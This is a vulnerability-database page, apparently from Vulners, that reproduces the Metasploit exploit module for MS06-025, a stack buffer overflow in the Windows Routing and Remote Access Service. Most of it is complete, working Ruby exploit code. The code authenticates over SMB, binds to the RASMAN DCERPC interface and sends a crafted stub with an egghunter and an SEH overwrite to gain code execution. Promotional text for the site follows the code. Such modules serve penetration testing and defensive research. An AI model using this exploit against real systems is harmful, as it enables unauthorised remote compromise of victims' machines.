Lucene search
K

MS06-025 Microsoft RRAS Service RASMAN Registry Overflow

🗓️ 20 Jun 2006 20:45:50Reported by pusscat <[email protected]>, hdm <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 47 Views

Microsoft RRAS Service RASMAN Registry Overflow, requires valid credentials, potentially impacting other system service

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS06-025 Microsoft RRAS Service RASMAN Registry Overflow',
      'Description'    => %q{
          This module exploits a registry-based stack buffer overflow in the Windows Routing
        and Remote Access Service. Since the service is hosted inside svchost.exe,
        a failed exploit attempt can cause other system services to fail as well.
        A valid username and password is required to exploit this flaw on Windows 2000.
        When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
        Exploiting this flaw involves two distinct steps - creating the registry key
        and then triggering an overwrite based on a read of this key. Once the key is
        created, it cannot be recreated. This means that for any given system, you
        only get one chance to exploit this flaw. Picking the wrong target will require
        a manual removal of the following registry key before you can try again:
        HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook
      },
      'Author'         => [ 'pusscat', 'hdm' ],
      'License'        => BSD_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2006-2370' ],
          [ 'OSVDB', '26437' ],
          [ 'BID', '18325' ],
          [ 'MSB', 'MS06-025' ]
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Payload'        =>
        {
          'Space'    => 512,
          'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 2000 SP4', { 'Ret' => 0x750217ae } ],  # call esi
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2006-06-13'))

    register_options(
      [
        OptString.new('SMBPIPE', [ true,  "Rawr.", 'router']),
      ])
  end

  # Post authentication bugs are rarely useful during automation
  def autofilter
    false
  end

  def exploit
    connect()
    smb_login()
    print_status("Trying target #{target.name}...")

    # Generate the egghunter payload
    hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
    egg    = hunter[1]

    # Pick a "filler" character that we know doesn't get mangled
    # by the wide string conversion routines
    filset = "\xc1\xff\x67\x1b\xd3\xa3\xe7"
    fil    = filset[ rand(filset.length) ].chr

    # Bind to the actual DCERPC interface
    handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
    print_status("Binding to #{handle}")
    dcerpc_bind(handle)
    print_status("Bound to #{handle}")

    # Add giant blocks of guard data before and after the egg
    eggdata  =
      fil * 1024 +
      egg +
      fil * 1024

    # Place the egghunter where ESI happens to point
    bof = (fil * 178)
    bof[84, hunter[0].length] = hunter[0]

    # Overwrite the SEH ptr, even though ESP is smashed
    # The handle after the ret must be an invalid address
    pat =
      (fil * 886) +
      NDR.long(target.ret) +
      (fil * 3) + "\xc0" +
      bof

    type2 =
      NDR.string( (fil * 1024) + "\x00" ) +
      NDR.string( pat + "\x00" ) +
      NDR.string( (fil * 4096) + "\x00" ) +
        NDR.long(rand(0xffffffff)) +
        NDR.long(rand(0xffffffff))

    type1 =
      NDR.long(rand(0xffffffff)) + # OperatorDial
      NDR.long(rand(0xffffffff)) + # PreviewPhoneNumber
      NDR.long(rand(0xffffffff)) + # UseLocation
      NDR.long(rand(0xffffffff)) + # ShowLights
      NDR.long(rand(0xffffffff)) + # ShowConnectStatus
      NDR.long(rand(0xffffffff)) + # CloseOnDial
      NDR.long(rand(0xffffffff)) + # AllowLogonPhonebookEdits
      NDR.long(rand(0xffffffff)) + # AllowLogonLocationEdits
      NDR.long(rand(0xffffffff)) + # SkipConnectComplete
      NDR.long(rand(0xffffffff)) + # NewEntryWizard
      NDR.long(rand(0xffffffff)) + # RedialAttempts
      NDR.long(rand(0xffffffff)) + # RedialSeconds
      NDR.long(rand(0xffffffff)) + # IdleHangUpSeconds
      NDR.long(rand(0xffffffff)) + # RedialOnLinkFailure
      NDR.long(rand(0xffffffff)) + # PopupOnTopWhenRedialing
      NDR.long(rand(0xffffffff)) + # ExpandAutoDialQuery
      NDR.long(rand(0xffffffff)) + # CallbackMode

      NDR.long(0x45) + type2 +     # Parsed by CallbackListFromRpc
      NDR.wstring("\x00" * 129)  +
      NDR.long(rand(0xffffffff)) +
      NDR.wstring("\x00" * 520)  +
      NDR.wstring("\x00" * 520)  +

      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +

      NDR.string("\x00" * 514) +

      NDR.long(rand(0xffffffff)) +
        NDR.long(rand(0xffffffff))

    stubdata =
      type1 +
      NDR.long(rand(0xffffffff)) +
      eggdata

    print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')

    begin
      print_status('Creating the malicious registry key...')
      response = dcerpc.call(0xA, stubdata)

      print_status('Attempting to trigger the base pointer overwrite...')
      response = dcerpc.call(0xA, stubdata)

    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
    end

    handler
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation